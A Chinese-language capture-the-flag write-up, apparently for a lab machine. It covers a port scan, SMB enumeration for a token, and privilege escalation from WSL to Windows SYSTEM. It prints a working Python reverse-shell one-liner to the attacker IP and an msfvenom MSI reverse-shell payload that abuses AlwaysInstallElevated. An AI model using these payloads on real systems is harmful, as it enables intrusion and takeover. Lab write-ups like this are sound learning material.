Before all
我想睡qqqq
🐳…
Victim’s IP : 10.10.254.66
Attacker’s IP : 10.9.195.189
Write up
RECON
port scan
Command
從今天開始我變成rustscan
的信徒orz
1 | rustscan -a 10.10.254.66 --ulimit 5000 -- -sC -sV |
Result
有開ssh(22), http(8888), smb(445), 3389(rdp)
Exploit
先進去 port 8888逛逛
進去網站後會發現一個token
,所以要先找出token是什麼。
smb
無法用一般的USERS當磁碟塊去連(
採用工具smbmap
掃出磁碟名稱:
Command
1 | smbmap -H 10.10.254.66 -u "guest" |
Result
利用smbclient
進行連線:
Command
1 | smbclient \\\\10.10.254.66\\datasci-team |
成功拿到Token!!!
web exploitation
拿到Token後進去,跑個python reverse shell直接RCE~
payload
1 | import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.9.195.189",1004));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("sh") |
Privilege Escalation
WSL to Windows
確認一下剛剛拿到的RCE,發現在WSL裡面…
看到可以檔案(由 ED25519 結尾,合理推斷是SSH KEY)
把內容都丟到rsa-ssh
的檔案裡,透過ssh進行連線:
command
1 | sudo ssh dev-datasci-lowpriv@10.10.254.66 -i rsa-ssh |
好欸成功!!!
User to System
接下來的目標就是變成:nt authority\system
所需要打到機器裡的腳本都是使用在本地的python http server處理。
PrivescCheck
PrivescCheck就是一個可以在windows上以現在的權限取得相關資訊的工具,而在這次的靶機中是為了取得密碼以及獲得提權立足點資訊:
Github 連結
使用者密碼:
立足點:
AlwaysInstallElevated,這個設定會讓使用者可以下載MSI後以提權後的角色執行。
https://dmcxblue.gitbook.io/red-team-notes/privesc/unquoted-service-path
本地生成MSI reverse shell:
Command
1 | msfvenom -p windows/x64/shell_reverse_tcp lhost=10.9.195.189 lport=8443 -f msi -o ./x64winreverse.msi --encoder x64/xor --arch x64 --iteration 9 |
接著在靶機中執行:
1 | runas /user:dev-datasci-lowpriv "msiexec /i C:\Users\dev-datasci-low |
最後輸入剛剛透過PrivescCheck獲得的密碼即可。
監聽端口:
提權成功!!!
After all
累了現在,這台機器讓我多學了一個windows提權,開心owob
p.s.其實我一開始是打 WinPEAS進去,抓到奇怪的process在python3.10,應該可以提權。但是我不會打(可能透過msfconsole(?))